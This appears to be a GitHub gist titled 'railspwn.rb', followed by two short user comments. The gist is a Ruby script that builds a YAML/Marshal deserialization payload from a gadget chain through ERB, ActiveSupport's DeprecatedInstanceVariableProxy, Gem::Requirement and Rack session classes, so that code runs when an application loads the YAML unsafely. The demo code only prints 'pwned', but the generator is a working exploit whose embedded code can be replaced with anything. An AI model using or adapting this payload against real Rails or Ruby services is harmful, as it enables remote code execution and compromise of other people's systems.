/railspwn.rb
Last active Jun 16, 2018
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy | |
| def initialize(instance, method) | |
| @instance = instance | |
| @method = method | |
| @deprecator = ActiveSupport::Deprecation.new | |
| end | |
| end | |
| end | |
| end | |
| code = <<-EOS | |
| puts "pwned" | |
| EOS | |
| erb = ERB.allocate | |
| erb.instance_variable_set :@src, code | |
| erb.instance_variable_set :@lineno, 1337 | |
| depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
| payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
| payload = <<-PAYLOAD | |
| --- | |
| !ruby/object:Gem::Requirement | |
| requirements: | |
| !ruby/object:Rack::Session::Abstract::SessionHash | |
| req: !ruby/object:Rack::Request | |
| env: | |
| "rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
| id: 'hi from espr' | |
| HTTP_COOKIE: "a=#{payload}" | |
| store: !ruby/object:Rack::Session::Cookie | |
| coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
| key: a | |
| secrets: [] | |
| exists: true | |
| loaded: false | |
| PAYLOAD | |
| puts payload |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
RicterZ
commented
Nov 21, 2017
|
A 0-day? I couldn't find any information about this security issue on Rails official website or Github. |
niklasb
commented
May 31, 2018
•
edited
Edited 3 times
-
niklasb
edited May 31, 2018
-
niklasb
edited May 31, 2018
-
niklasb
edited May 31, 2018
-
niklasb
created May 31, 2018
edited
Edited 3 times
-
May 31, 2018 -
May 31, 2018 -
May 31, 2018 -
May 31, 2018
|
@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
A 0-day? I couldn't find any information about this security issue on Rails official website or Github.